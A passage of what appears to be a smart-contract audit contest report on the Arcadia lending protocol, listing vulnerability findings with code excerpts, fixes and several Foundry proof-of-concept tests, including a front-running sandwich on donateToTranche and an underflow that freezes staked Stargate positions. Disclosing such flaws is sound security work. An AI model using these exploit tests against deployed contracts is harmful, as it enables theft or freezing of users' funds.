646:        uint256 interest = calcUnrealisedDebt().mulDivDown(interestWeight[owner_], totalInterestWeight);
            unchecked {
                assets = realisedLiquidityOf[owner_] + interest;
            }
        } else {
            assets = realisedLiquidityOf[owner_];
        }
    }

In the case of lastSyncedTimestamp != block.timestamp, the above function calculates the unrealised interest by interestWeight state variable.

On the other hand, LendingPool.sol#setTreasuryWeights function is the following.

    function setTreasuryWeights(uint16 interestWeight_, uint16 liquidationWeight) external onlyOwner processInterests {
        totalInterestWeight = totalInterestWeight - interestWeightTreasury + interestWeight_;

        emit TreasuryWeightsUpdated(
            interestWeightTreasury = interestWeight_, liquidationWeightTreasury = liquidationWeight
        );
    }

As can be seen, the above function does not set interestWeight state variable and interestWeight[treasury] = address(0) always hold.
Thus when owner_ = treasury in the liquidityOf function, interest = 0 holds true in L646.

In the meantime, administrator also can get liquidity of treasury by calling LendingPool.sol#liquidityOfAndSync function, but the function has no view modifier so it does not return before block has been mined and it consumes more gas.

Impact

Administrator cannot get liquidity of treasury correctly.

Code Snippet

https://github.com/sherlock-audit/2023-12-arcadia/blob/main/lending-v2/src/LendingPool.sol#L646

Tool used

Manual Review

Recommendation

Modify LendingPool.sol#liquidityOf function as follows.

    function liquidityOf(address owner_) external view returns (uint256 assets) {
        // Avoid a second calculation of unrealised debt (expensive).
        // if interests are already synced this block.
        if (lastSyncedTimestamp != uint32(block.timestamp)) {
            // The total liquidity of a tranche equals the sum of the realised liquidity
            // of the tranche, and its pending interests.
--          uint256 interest = calcUnrealisedDebt().mulDivDown(interestWeight[owner_], totalInterestWeight);
++          uint256 weight = interestWeight[owner_];
++          if (owner_ == treasury) {
++              weight = interestWeightTreasury;
++          }
++          uint256 interest = calcUnrealisedDebt().mulDivDown(weight, totalInterestWeight);
            unchecked {
                assets = realisedLiquidityOf[owner_] + interest;
            }
        } else {
            assets = realisedLiquidityOf[owner_];
        }
    }

Duplicate of #169

n1punp - Guardian may not be able to `pause` the protocol under certain conditions.

n1punp

high

Guardian may not be able to pause the protocol under certain conditions.

Summary

Guardian may not be able to pause the protocol under certain conditions. To be precise, these are some of the possible scenarios:

Scenario 1:

  1. At day 0, Guardian paused the protocol to investigate any issues.
  2. Quickly after the guardian resolved the issues, the Owner unpaused the protocol.
  3. Now, between day 0 to 32, the guardian can no longer pause the protocol the second time.

Scenario 2:

  1. At day 0, Guardian paused the protocol.
  2. At day 30, someone calls unpause public function to allow repay, withdraw, and liquidation.
  3. Now, if unexpected event happens between day 30 to 32, the guardian can no longer pause the protocol again.

Vulnerability Detail

The pause function by the owner can only pause once every 32 days. When the pause is called, pauseTimestamp is updated to the block timestamp at execution.

However, there are 2 ways to unpause:

  1. Guardian unpause -- this simply tries to unpause, but does not reset the cooldown.
  2. Public unpause -- this can only be called after day +30.

However, none of unpauses actually resets the pauseTimestamp. This means that after the first pause, the second pause can only happen 32 days+ after. But in fact, it is possible that the guardian may need to pause the protocols more than 1 time in the 32 day duration (see example scenarios above).

Impact

Guardian may not be able to pause the protocol when they want to.

Code Snippet

https://github.com/sherlock-audit/2023-12-arcadia/blob/main/lending-v2/src/guardians/LendingPoolGuardian.sol#L103

Tool used

Manual Review

Recommendation

  • Consider resetting pauseTimestamp when unpause. This, however, may add other complications.

web3_r - User can loose assets when withdrawing or redeeming from Tranche.sol

web3_r

high

User can loose assets when withdrawing or redeeming from Tranche.sol

Summary

When calling withdraw or redeeming in Tranche.sol, a user can loose his assets

Vulnerability Detail

User shares are been burnt before checking if the assets is <= to his actual shares of the pool.

This check takes please in LENDING_POOL.withdrawFromLendingPool and reverts if realisedLiquidityOf[msg.sender] > assets amount

Impact

User could permanently loose access to their funds in pool

Code Snippet

   function withdraw(uint256 assets, address receiver, address owner_)
        public
        override
        notLocked
        notDuringAuction
        returns (uint256 shares)
    {
        // No need to check for rounding error, previewWithdraw rounds up.
        shares = previewWithdrawAndSync(assets);

        if (msg.sender != owner_) {
            // Saves gas for limited approvals.
            uint256 allowed = allowance[owner_][msg.sender];

            if (allowed != type(uint256).max) allowance[owner_][msg.sender] = allowed - shares;
        }

        _burn(owner_, shares); //  <= burn before check

        LENDING_POOL.withdrawFromLendingPool(assets, receiver);

        emit Withdraw(msg.sender, receiver, owner_, assets, shares);
    }
  function redeem(uint256 shares, address receiver, address owner_)
        public
        override
        notLocked
        notDuringAuction
        returns (uint256 assets)
    {
        if (msg.sender != owner_) {
            // Saves gas for limited approvals.
            uint256 allowed = allowance[owner_][msg.sender];

            if (allowed != type(uint256).max) allowance[owner_][msg.sender] = allowed - shares;
        }

        // Check for rounding error since we round down in previewRedeem.
        if ((assets = previewRedeemAndSync(shares)) == 0) revert TrancheErrors.ZeroAssets();

        _burn(owner_, shares); // <= burn before check

        LENDING_POOL.withdrawFromLendingPool(assets, receiver);

        emit Withdraw(msg.sender, receiver, owner_, assets, shares);
    }

Tool used

Manual Review

Recommendation

Check user assets balance are sufficient to withdraw before burning shares

0xrice.cooker - Chainlink in Optimism chain currently not supporting price feed to Stargate token

0xrice.cooker

medium

Chainlink in Optimism chain currently not supporting price feed to Stargate token

Summary

Chainlink in Optimism chain currently not supporting price feed to Stargate token

Vulnerability Detail

In README, Arcadia support Optimism chain and STG token. But Chainlink is not supporting price feed to Stargate token in OP chain

Impact

Acording to sherlock docs, this issue is a medium because it will breaks core contract functionality:

Breaks core contract functionality, rendering the contract useless or leading to loss of funds.

Code Snippet

https://docs.chain.link/data-feeds/price-feeds/addresses?network=optimism&page=1&search=stg
https://github.com/sherlock-audit/2023-12-arcadia/blob/de7289bebb3729505a2462aa044b3960d8926d78/accounts-v2/src/oracle-modules/ChainlinkOM.sol#L118C1-L129C6

Tool used

Manual Review

Recommendation

Wait for chainlink to support this, or change to alternative oracle

mstpr-brainbot - Creditors can be over-exposed to reward token of Stargate

mstpr-brainbot

medium

Creditors can be over-exposed to reward token of Stargate

Summary

When a staked Stargate position is added to users account the claimable reward tokens are also accounted. However, the claimable reward tokens are then never updated. Exposure to the reward token can exceed the max exposure limit a creditor has for the reward token

Vulnerability Detail

When a new deposit is made into the Staked Stargate position, the reward tokens are included as part of the underlying assets. The issue arises from the fact that the exposure is only calculated at the time of deposit, and if the account does not claim or withdraw the accrued reward tokens, they will not be considered in the exposure calculation.

Textual PoC:
Let's assume the reward token is STG, and the maximum exposure for creditor "A" in STG tokens is 100K, with 70K STG already deposited, leaving only 30K STG available for exposure.

Now, suppose Alice, Bob, and Carol deposit significant amounts of Stargate staked LP, earning 5K STG tokens every week. Since the initial deposit, there were no accrued reward tokens, and thus, no new STG exposure was credited to the creditor.

After 10 weeks, there are 50K STG claimable for all users, but the exposure remains at 70K, with 30K STG available for additional deposits. Another 10 weeks pass, and there are now 100K STG claimable, with an additional 30K STG deposited by other users. The total exposure has now reached 100K STG, the ideal target for the creditor. However, an additional 100K STG from the staked Stargate AM stakers is also considered as value, further increasing the exposure. This exposure continues to grow as long as the stakers do not withdraw their portion. Also, the staked Stargate AM stakers claimable STG accounted as "value" hence it can be backing a debt they have on top of over exposing the creditors limit.

Impact

A creditor can be over exposed to an asset that they were not intended to.

Code Snippet

https://github.com/sherlock-audit/2023-12-arcadia/blob/de7289bebb3729505a2462aa044b3960d8926d78/accounts-v2/src/asset-modules/abstracts/AbstractStakingAM.sol#L174-L191

Tool used

Manual Review

Recommendation

Whenever someone deposits to the their account, consider the cumulative pending reward tokens rather than individual STG claimable by positions.

jesjupyer - Lack of `minAnswer` check for oracle may lead to bad pricing during flash crashes

jesjupyer

medium

Lack of minAnswer check for oracle may lead to bad pricing during flash crashes

Summary

Chainlink price feeds have in-built minimum & maximum prices they will return. When the Black Swan Event happens, and a flash crash happens(like LUNA Coin), even when the price of an asset falls below the price feed’s minimum price, only the minimum price is returned. So if the minAnswer check is not performed, the actual answer get is incorrect. This could lead to a very bad situation due to bad pricing. For example, the account will remain healthy which should be liquidated.

Vulnerability Detail

In ChainlinkOM::_getLatestAnswer, the answer_ is not compared with minAnswer and maxAnswer which should be queried from Aggregator.

        try IChainLinkData(oracleInformation_.oracle).latestRoundData() returns (
            uint80 roundId, int256 answer_, uint256, uint256 updatedAt, uint80
        ) {
            if (
                roundId > 0 && answer_ >= 0 && updatedAt > block.timestamp - oracleInformation_.cutOffTime
                    && updatedAt <= block.timestamp
            ) {
                success = true;
                answer = uint256(answer_);
            }
        } catch { }

The problem is that Chainlink price feeds have in-built minimum & maximum prices they will return. When the Black Swan Event happens, and a flash crash happens(like LUNA Coin), even when the price of an asset falls below the price feed’s minimum price, only the minimum price is returned.

Since this contract uses Oracle to calculate the price of an asset, this will lead to the following situation:

  1. A coin has experienced a flash crash, and its price goes down to $0.05.
  2. The minAnswer in the Aggregator is set to be $0.1 and is not updated.
  3. The returned value of the price will be much higher than what it should be.

As a consequence, an account could remain healthy which should be liquidated. The user could buy the coin at market price and deposit it into the protocol to avoid liquidation.

Impact

Lack of minAnswer check could lead to bad pricing. As a consequence, an account could remain healthy which should be liquidated. And user could buy the coin at market price and deposit it into the protocol to avoid liquidation. The liquidation mechanism will be greatly affected.

Code Snippet

ChainlinkOM::_getLatestAnswer

        try IChainLinkData(oracleInformation_.oracle).latestRoundData() returns (
            uint80 roundId, int256 answer_, uint256, uint256 updatedAt, uint80
        ) {
            if (
                roundId > 0 && answer_ >= 0 && updatedAt > block.timestamp - oracleInformation_.cutOffTime
                    && updatedAt <= block.timestamp
            ) {
                success = true;
                answer = uint256(answer_);
            }
        } catch { }

Tool used

Manual Review, VScode

Recommendation

Add a check that the answer falls in the range of minAnswer and maxAnswer so that the price is valid.

erosjohn - LendingPool.sol#donateToTranche is vulnerable to reward hunting attacks through front-running

erosjohn

high

LendingPool.sol#donateToTranche is vulnerable to reward hunting attacks through front-running

Summary

In deposit/mint and withdraw/redeem of Tranche.sol, there are no cooling-down periods and fees, so users can deposit or withdraw assets at any time. And donateToTranche in LendingPool.sol will cause a step change in realisedLiquidityOf[tranche]. Attackers could frontrun donateToTranche to deposit and then immediately withdraw, this will result in the attackers getting rewards without any effort.

Vulnerability Detail

The donateToTranche function is supposed to serve as a way to compensate the jrTranche after an auction didn't get sold and was manually liquidated after cutoffTime, and it can be used by anyone to donate assets to the Lending Pool.
The specific code is as follows.

function donateToTranche(uint256 trancheIndex, uint256 assets) external whenDepositNotPaused processInterests {
    if (assets == 0) revert LendingPoolErrors.ZeroAmount();

    address tranche = tranches[trancheIndex];

    // Need to transfer before donating or ERC777s could reenter.
    // Address(this) is trusted -> no risk on re-entrancy attack after transfer.
    asset.safeTransferFrom(msg.sender, address(this), assets);

    unchecked {
@>      realisedLiquidityOf[tranche] += assets; //[̲̅$̲̅(̲̅ ͡° ͜ʖ ͡°̲̅)̲̅$̲̅]
        totalRealisedLiquidity = SafeCastLib.safeCastTo128(assets + totalRealisedLiquidity);
    }
}

realisedLiquidityOf[tranche] += assets will cause the liquidity recorded of tranche to increase.

function liquidityOfAndSync(address owner_) external returns (uint256 assets) {
    _syncInterests();
@>  assets = realisedLiquidityOf[owner_];
}
function totalAssetsAndSync() public returns (uint256 assets) {
@>  assets = LENDING_POOL.liquidityOfAndSync(address(this));
}

Observe the above code, the previously added realisedLiquidityOf[tranche] will be used to calculate total assets in Tranche.sol.
So before donateToTranche, the attacker can deposit/mint, and after it, the attacker withdraw/redeem. In other words, the step changes of realisedLiquidityOf[tranche] will lead to front-running or sandwich attacks.

Impact

The attacker steals rewards that do not belong to him through this attack(deposit and then immediately withdraw) because he never provided usable assets to LendingPool.sol.
We can consider the following normal scenarios:

  1. An auction didn't get sold and was manually liquidated after cutoffTime
  2. The attacker deposit some assets to the target tranache
  3. donateToTranche is called to compensate the target tranche
  4. The attacker withdraw all his assets, and this is more than he deposited

The following code simply demonstrates this scenario, just add the test_Deposit_Donate_Withdraw function to Deposit.fuzz.t.sol and run it.

function test_Deposit_Donate_Withdraw() public {
    // Prepare
    vm.prank(users.liquidityProvider);
    asset.burn(type(uint256).max / 2);
    vm.prank(users.tokenCreatorAddress);
    asset.mint(users.swapper, type(uint256).max / 2) ;
    vm.prank(users.swapper);
    asset.approve(address(pool), type(uint256).max / 2);
    // Imitate that the tranche already minted some shares
    vm.prank(users.swapper);
    tranche.deposit(1000 ether, users.swapper);

    // POC start: Alice wants to launch a Sandwich Attack
    // Before donate, alice deposits
    uint256 assetsInput = 10 ether;
    vm.prank(users.liquidityProvider);
    tranche.deposit(assetsInput, users.liquidityProvider);
    // Someone donates some assets
    vm.prank(users.swapper);
    pool.donateToTranche(0, 10 ether);
    // After donate, alice withdraws
    vm.prank(users.liquidityProvider);
    assertGt(tranche.maxWithdraw(users.liquidityProvider), assetsInput);
}

Code Snippet

https://github.com/sherlock-audit/2023-12-arcadia/blob/main/lending-v2/src/Tranche.sol#L156-L261
https://github.com/sherlock-audit/2023-12-arcadia/blob/main/lending-v2/src/LendingPool.sol#L350-L361

Tool used

Manual Review

Recommendation

  1. Stepwise increase that affects rewards is an unreasonable model and should be avoided as much as possible.
  2. Adding cooling-down periods and fees to prevent reward hunting.

Duplicate of #121

Hajime - LendingPool.startLiquidation() can be called several times for one position

Hajime

medium

LendingPool.startLiquidation() can be called several times for one position

Summary

startLiquidation() can be called several times for one position in LendingPool.sol

Vulnerability Detail

At each call of the startLiquidation() initiationReward will be added to realisedLiquidityOf, thus increasing the amount of the reward

function startLiquidation(address initiator, uint256 minimumMargin_)
        external
        override
        whenLiquidationNotPaused
        processInterests
        returns (uint256 startDebt)
    {

        // @audit there is no verification that liquidation has begun

        // Only Accounts can have debt, and debtTokens are non-transferrable.
        // Hence by checking that the balance of the msg.sender is not 0,
        // we know that the sender is indeed an Account and has debt.
        startDebt = maxWithdraw(msg.sender);
        if (startDebt == 0) revert LendingPoolErrors.IsNotAnAccountWithDebt();

        // Calculate liquidation incentives which have to be paid by the Account owner and are minted
        // as extra debt to the Account.
        (uint256 initiationReward, uint256 terminationReward, uint256 liquidationPenalty) =
            _calculateRewards(startDebt, minimumMargin_);

        // Mint the liquidation incentives as extra debt towards the Account.
        _deposit(initiationReward + liquidationPenalty + terminationReward, msg.sender);

        // Increase the realised liquidity for the initiator.
        // The other incentives will only be added as realised liquidity for the respective actors
        // after the auction is finished.
        realisedLiquidityOf[initiator] += initiationReward;
        totalRealisedLiquidity = SafeCastLib.safeCastTo128(totalRealisedLiquidity + initiationReward);

        // If this is the sole ongoing auction, prevent any deposits and withdrawals in the most jr tranche
        if (auctionsInProgress == 0 && tranches.length > 0) {
            unchecked {
                ITranche(tranches[tranches.length - 1]).setAuctionInProgress(true);
            }
        }

        unchecked {
            ++auctionsInProgress;
        }

        // Emit event
        emit AuctionStarted(msg.sender, address(this), uint128(startDebt));
    }

Impact

Because of the absence of checking whether liquidation has started or not, the function can be called several times for one account, thus attacker increasing own initiationReward

Code Snippet

https://github.com/sherlock-audit/2023-12-arcadia/blob/main/lending-v2/src/LendingPool.sol#L861-L901

Tool used

Manual Review

Recommendation

add a check for the start of liquidation and use nonReentrant

deth - AbstractStakingAM.sol#_getRewardBalances() - Incorrect logic inside reward calculation leads a revert, freezing user funds and miscalculating user rewards

deth

high

AbstractStakingAM.sol#_getRewardBalances() - Incorrect logic inside reward calculation leads a revert, freezing user funds and miscalculating user rewards

Summary

Incorrect logic inside reward calculation leads a revert, freezing user funds and miscalculating user rewards.

Vulnerability Detail

_getRewardBalances is used to calculate the current global and position specific rewards for contracts that inherit from AbstractStakingAM

function _getRewardBalances(AssetState memory assetState_, PositionState memory positionState_)
        internal
        view
        returns (AssetState memory, PositionState memory)
    {   
        if (assetState_.totalStaked > 0) {
            // Calculate the new assetState
            // Fetch the current reward balance from the staking contract.
            uint256 currentRewardGlobal = _getCurrentReward(positionState_.asset);
            // Calculate the increase in rewards since last Asset interaction.
            uint256 deltaReward = currentRewardGlobal - assetState_.lastRewardGlobal;
            uint256 deltaRewardPerToken = deltaReward.mulDivDown(1e18, assetState_.totalStaked);
            // Calculate and update the new RewardPerToken of the asset.
            // unchecked: RewardPerToken can overflow, what matters is the delta in RewardPerToken between two interactions.
            unchecked {
                assetState_.lastRewardPerTokenGlobal =
                    assetState_.lastRewardPerTokenGlobal + SafeCastLib.safeCastTo128(deltaRewardPerToken);
            }
            // Update the reward balance of the asset.
            assetState_.lastRewardGlobal = SafeCastLib.safeCastTo128(currentRewardGlobal);

            // Calculate the new positionState.
            // Calculate the difference in rewardPerToken since the last position interaction.
            // unchecked: RewardPerToken can underflow, what matters is the delta in RewardPerToken between two interactions.
            unchecked {
                deltaRewardPerToken = assetState_.lastRewardPerTokenGlobal - positionState_.lastRewardPerTokenPosition;
            }
            // Calculate the rewards earned by the position since its last interaction.
            // unchecked: deltaRewardPerToken and positionState_.amountStaked are smaller than type(uint128).max.
            unchecked {
                deltaReward = deltaRewardPerToken * positionState_.amountStaked / 1e18;
            }
            // Update the reward balance of the position.
            positionState_.lastRewardPosition =
                SafeCastLib.safeCastTo128(positionState_.lastRewardPosition + deltaReward);
        }
        // Update the RewardPerToken of the position.
        positionState_.lastRewardPerTokenPosition = assetState_.lastRewardPerTokenGlobal;

        return (assetState_, positionState_);
    }

In order to get the actual rewards, the function uses _getCurrentReward , which is a function that is supposed to be overridden by the contract inheriting AbstractStakingAM

One such class is StakedStargateAM

function _getCurrentReward(address asset) internal view override returns (uint256 currentReward) {
        currentReward = LP_STAKING_TIME.pendingEmissionToken(assetToPid[asset], address(this));
    }

The function makes an external call to Stargate’s LPStakingTime.sol#pendingEmissionToken

function pendingEmissionToken(uint256 _pid, address _user) external view returns (uint256) {
        PoolInfo storage pool = poolInfo[_pid];
        UserInfo storage user = userInfo[_pid][_user];
        uint256 accEmissionPerShare = pool.accEmissionPerShare;
        uint256 lpSupply = pool.lpToken.balanceOf(address(this));
        if (block.timestamp > pool.lastRewardTime && lpSupply != 0 && totalAllocPoint > 0) {
            uint256 multiplier = getMultiplier(pool.lastRewardTime, block.timestamp);
            uint256 tokenReward = multiplier.mul(eTokenPerSecond).mul(pool.allocPoint).div(totalAllocPoint);
            accEmissionPerShare = accEmissionPerShare.add(tokenReward.mul(1e12).div(lpSupply));
        }
        return user.amount.mul(accEmissionPerShare).div(1e12).sub(user.rewardDebt);
    }

The protocol assumes that Stargate will always return a bigger value each time pendingEmissionToken is called, in a sort of linear manner, each time the function is called, the number will continue increasing.

Because of this assumption, the protocol manually calculates the increase in rewards.

            // Calculate the increase in rewards since last Asset interaction.
            uint256 deltaReward = currentRewardGlobal - assetState_.lastRewardGlobal;

Taking another look at pendingEmissionToken

function pendingEmissionToken(uint256 _pid, address _user) external view returns (uint256) {
        PoolInfo storage pool = poolInfo[_pid];
        UserInfo storage user = userInfo[_pid][_user];
        uint256 accEmissionPerShare = pool.accEmissionPerShare;
        uint256 lpSupply = pool.lpToken.balanceOf(address(this));
        if (block.timestamp > pool.lastRewardTime && lpSupply != 0 && totalAllocPoint > 0) {
            uint256 multiplier = getMultiplier(pool.lastRewardTime, block.timestamp);
            uint256 tokenReward = multiplier.mul(eTokenPerSecond).mul(pool.allocPoint).div(totalAllocPoint);
            accEmissionPerShare = accEmissionPerShare.add(tokenReward.mul(1e12).div(lpSupply));
        }
        return user.amount.mul(accEmissionPerShare).div(1e12).sub(user.rewardDebt);
    }

You’ll notice what the function returns:

return user.amount.mul(accEmissionPerShare).div(1e12).sub(user.rewardDebt);

It takes the user.amount which is the amount that msg.sender (StakedStargateAM) has deposited, then it multiplies it by the accEmissionPerShare which is calculated above, divides by 1e12 and then subtracts user.rewardDebt

user.rewardDebt acts as a checkpoint in a way to track rewards.

user.rewardDebt is set when deposit and withdraw are called inside LPStakingTime

We’ll take a look at only deposit as the logic is mirrored inside withdraw

 function deposit(uint256 _pid, uint256 _amount) external {
        PoolInfo storage pool = poolInfo[_pid];
        UserInfo storage user = userInfo[_pid][msg.sender];
        updatePool(_pid);
        if (user.amount > 0) {
            uint256 pending = user.amount.mul(pool.accEmissionPerShare).div(1e12).sub(user.rewardDebt);
            safeTokenTransfer(msg.sender, pending);
        }
        pool.lpToken.safeTransferFrom(address(msg.sender), address(this), _amount);
        user.amount = user.amount.add(_amount);
        user.rewardDebt = user.amount.mul(pool.accEmissionPerShare).div(1e12);
        lpBalances[_pid] = lpBalances[_pid].add(_amount);
        emit Deposit(msg.sender, _pid, _amount);
    }

You’ll notice that user.rewardDebt is set to user.amount.mul(pool.accEmissionPerShare).div(1e12)

Going back to pendingEmissionToken you’ll see that the return basically just calculates the user’s new rewardDebt and then it subtracts his old rewardDebt

Stargate do this, because unlike most other staking contracts, Stargate transfers rewards on both a deposit and a withdraw, thus they calculate rewards like so.

This is the root of the problem, as it returns “current pending” rewards, not “total” rewards which the protocol assumes it will.

The example is very dumbed down, just to give an overview of the problem for simplicity.
Example:

  1. Account1 stakes 1e18 tokens through StakedStargateAM
  2. assetState.lastRewardGlobal is 0 , as this is the first stake.
  3. 10 days pass and Account2 stakes 1e18
  4. Since pendingEmissionToken returns 100
  5. deltaReward will be 100, since 100 - 0 = 100
  6. 5 days pass and Account3 attempts to stake 1e18 tokens
  7. pendingEmissionToken returns only 50
  8. The next line reverts, as we attempt 50 - 150 and since the value is uint the whole tx reverts.
  9. The whole contract is now frozen until pendingEmissionToken returns a value > 100 . All funds are stuck, no depositing/withdrawing or claiming of rewards can be done, since all three of these functions use _getRewardBalances

Because of the above, rewards will also be calculated incorrectly, a second PoC is attached demonstrating the issue.

Impact

Affected functions are:

  • mint
  • increaseLiquidity
  • decreaseLiquidity
  • claimReward
  • rewardOf

No depositing/withdrawing/claiming of rewards can be done. The bigger the difference between lastRewardsGlobal the bigger the DoS of the entire contract.

The second depositor can weaponize this and deposit after 30 days for example, to completely freeze the first depositor’s assets for 30 days. (Again this can be more/less than 30, it's an example)

But the issue will persist even after that and will continue growing, as each time lastRewardGlobal increases, the longer the DoS will be.

For example if lastRewardGlobal = 1e18 , then only after pendingEmissionToken returns > 1e18 will the function execute normally, which at that point lastRewardGlobal will be even bigger and so the next DoS will be even longer.

Rewards will also be incorrectly calculated, as showcased by the second PoC.

Proof of Concept

To clearly see what is happening I recommend adding 2 console.logs after _getCurrentReward like so.

function _getRewardBalances(AssetState memory assetState_, PositionState memory positionState_)
        internal
        view
        returns (AssetState memory, PositionState memory)
    {   
        if (assetState_.totalStaked > 0) {
            // Calculate the new assetState
            // Fetch the current reward balance from the staking contract.
            uint256 currentRewardGlobal = _getCurrentReward(positionState_.asset);
->          console.log("Current reward global: ", currentRewardGlobal);
->          console.log("Last reward global: ", assetState_.lastRewardGlobal);
            // Calculate the increase in rewards since last Asset interaction.
            uint256 deltaReward = currentRewardGlobal - assetState_.lastRewardGlobal;
            uint256 deltaRewardPerToken = deltaReward.mulDivDown(1e18, assetState_.totalStaked);
            // Calculate and update the new RewardPerToken of the asset.
            // unchecked: RewardPerToken can overflow, what matters is the delta in RewardPerToken between two interactions.
            unchecked {
                assetState_.lastRewardPerTokenGlobal =
                    assetState_.lastRewardPerTokenGlobal + SafeCastLib.safeCastTo128(deltaRewardPerToken);
            }
            // Update the reward balance of the asset.
            assetState_.lastRewardGlobal = SafeCastLib.safeCastTo128(currentRewardGlobal);

            // Calculate the new positionState.
            // Calculate the difference in rewardPerToken since the last position interaction.
            // unchecked: RewardPerToken can underflow, what matters is the delta in RewardPerToken between two interactions.
            unchecked {
                deltaRewardPerToken = assetState_.lastRewardPerTokenGlobal - positionState_.lastRewardPerTokenPosition;
            }
            // Calculate the rewards earned by the position since its last interaction.
            // unchecked: deltaRewardPerToken and positionState_.amountStaked are smaller than type(uint128).max.
            unchecked {
                deltaReward = deltaRewardPerToken * positionState_.amountStaked / 1e18;
            }
            // Update the reward balance of the position.
            positionState_.lastRewardPosition =
                SafeCastLib.safeCastTo128(positionState_.lastRewardPosition + deltaReward);
        }
        // Update the RewardPerToken of the position.
        positionState_.lastRewardPerTokenPosition = assetState_.lastRewardPerTokenGlobal;

        return (assetState_, positionState_);
    }

Paste the following inside USDbCPool.fork.t.sol and run forge test --mt test_getRewardBalancesBreaksForStargate -vvvv

function test_getRewardBalancesBreaksForStargate() public {
        // Amount of underlying assets deposited in Stargate pool.
        uint256 amount1 = 1_000_000 * 10 ** USDbC.decimals();
        uint256 amount2 = 123_456 * 10 ** USDbC.decimals();

        // 2 users deploy a new Arcadia Account.
        address payable user1 = createUser("user1");
        address payable user2 = createUser("user2");

        vm.prank(user1);
        address arcadiaAccount1 = factory.createAccount(100, 0, address(0));

        vm.prank(user2);
        address arcadiaAccount2 = factory.createAccount(101, 0, address(0));

        // Stake Stargate Pool LP tokens in the Asset Modules and deposit minted ERC721 in Accounts.
        uint256 lpBalance1 = stakeInAssetModuleAndDepositInAccount(user1, arcadiaAccount1, USDbC, amount1, pid, pool);
        // 30 days pass and arcadiaAccount2 stakes as well
        vm.warp(block.timestamp + 30 days);
        uint256 lpBalance2 = stakeInAssetModuleAndDepositInAccount(user2, arcadiaAccount2, USDbC, amount2, pid, pool);

        // 20 days pass and account1 wants to decrease his liquidity
        vm.warp(block.timestamp + 20 days);

        vm.startPrank(arcadiaAccount1);
        // The tx reverts with an underflow
        vm.expectRevert();
        // The amount is irrelevant as we don't even reach that part of the code
        stakedStargateAM.decreaseLiquidity(1, 100);

        // The type of function doesn't matter as they all call _getRewardBalances
        vm.expectRevert();
        stakedStargateAM.burn(1);
        vm.stopPrank();
     }

PoC showcasing incorrect reward distribution.

function test_IncorrectHandlingOfRewards() public {
        uint256 initBalance = 1000 * 10 ** USDbC.decimals();
        assert(ERC20(address(pool)).balanceOf(users.accountOwner) == 0);

        // Given : A user deposits in the Stargate USDbC pool, in exchange of an LP token.
        vm.startPrank(users.accountOwner);
        deal(address(USDbC), users.accountOwner, initBalance);

        USDbC.approve(address(router), initBalance);
        router.addLiquidity(poolId, initBalance, users.accountOwner);

        // And : The user stakes the LP token via the StargateAssetModule
        uint256 stakedAmountFirst = ERC20(address(pool)).balanceOf(users.accountOwner);
        console.log(stakedAmountFirst);
        ERC20(address(pool)).approve(address(stakedStargateAM), stakedAmountFirst);
        uint256 tokenId = stakedStargateAM.mint(address(pool), uint128(stakedAmountFirst));

        vm.warp(block.timestamp + 50 days);

        deal(address(USDbC), users.accountOwner, initBalance * 2);
        USDbC.approve(address(router), initBalance * 2);
        router.addLiquidity(poolId, initBalance * 2, users.accountOwner);

        uint256 stakedAmountSecond = ERC20(address(pool)).balanceOf(users.accountOwner) - stakedAmountFirst;
        console.log( ERC20(address(pool)).balanceOf(users.accountOwner));
        ERC20(address(pool)).approve(address(stakedStargateAM), stakedAmountSecond);
        stakedStargateAM.increaseLiquidity(tokenId, uint128(stakedAmountSecond));


        vm.warp(block.timestamp + 100 days);
        stakedStargateAM.claimReward(tokenId);

        ERC20 rewardToken = stakedStargateAM.REWARD_TOKEN();
        assertEq(rewardToken.balanceOf(address(stakedStargateAM)), 0);

        vm.stopPrank();
    }

Code Snippet

https://github.com/arcadia-finance/accounts-v2/blob/9b24083cb832a41fce609a94c9146e03a77330b4/src/asset-modules/abstracts/AbstractStakingAM.sol#L539

Tool used

Manual Review
Foundry

Recommendation

Since AbstractStakingAM is used as a base class, I recommend making _getRewardBalances virtual so that each implementation can override it.

Duplicate of #38

joshuajee - Unbounded loop in the smart contract can lead to DOS in some functions.

joshuajee

medium

Unbounded loop in the smart contract can lead to DOS in some functions.

Summary

The tranches array can grow to any size, this will cause the max gas per block limit to be exceeded causing the transaction to revert on the _syncInterestsToLiquidityProviders and _processDefault functions that loop through this array.

Vulnerability Detail

The _syncInterestsToLiquidityProviders and _processDefault functions loop through the tranches array, If this array grows above a certain size, a function calling any of these above internal functions will experience a DOS

Impact

The following functions will be inoperable when this happens _syncInterestsToLiquidityProviders, _processDefault, settleLiquidationUnhappyFlow, _syncInterests, liquidityOfAndSync, and processInterests.
Every function using the processInterests modifier would be affected, e.g setInterestWeightTranche, setTreasuryWeights, addTranche, depositInLendingPool etc.

Code Snippet

https://github.com/sherlock-audit/2023-12-arcadia/blob/main/lending-v2/src/LendingPool.sol#L754
https://github.com/sherlock-audit/2023-12-arcadia/blob/main/lending-v2/src/LendingPool.sol#L1065

POC

The transaction cost to donateToTranche increase very high after the from the first 100 tranches to 200 tranches, this could lead to a DOS of the system and the more gas cost for users

 
    function testFuzz_poc_tranche_dos(uint256 vas) public {

        vm.startPrank(users.creatorAddress);
   
        for (uint i = 0; i < 100; i++) {
            pool.addTranche(address(new TrancheExtension(address(pool), vas, "Tranche", "T")), 10);
        }

        vm.stopPrank();
  
        vm.startPrank(users.liquidityProvider);

        vm.txGasPrice(2);
        pool.donateToTranche(0, 1 ether);
        console.log("Gas Usage After 100 Tranch", gasleft());

        vm.stopPrank();

        vm.startPrank(users.creatorAddress);
   
        for (uint i = 0; i < 100; i++) {
            pool.addTranche(address(new TrancheExtension(address(pool), vas, "Tranche", "T")), 10);
        }

        vm.stopPrank();
  
        vm.startPrank(users.liquidityProvider);

       
        vm.txGasPrice(2);
        pool.donateToTranche(0, 1 ether);
        console2.log("Gas Usage After 200 Tranch", gasleft());

        vm.stopPrank();

    }

Tool used

Manual Review

Recommendation

Avoid looping through unbounded arrays, add checks to prevent the tranches array from growing above a certain value.

jesjupyer - User could create non-sense `proxy` before `versionInformation` is ever set

jesjupyer

medium

User could create non-sense proxy before versionInformation is ever set

Summary

The check in Factory::createAccount will use the newest version when accountVersion == 0. However, there is a lack of check that latestAccountVersion should not be 0 as no versionInformation is ever set at this point. Because of this, before the function Factory::setNewAccountInfo is ever called, a user could still call Factory::createAccount without reverting. The returned proxy will always delegate to address(0) and is nonsense. However, the NFT will still be minted and still be counted as valid accounts.

Vulnerability Detail

For Factory::createAccount , user can chose to set accountVersion as 0 to switch to latestAccountVersion.

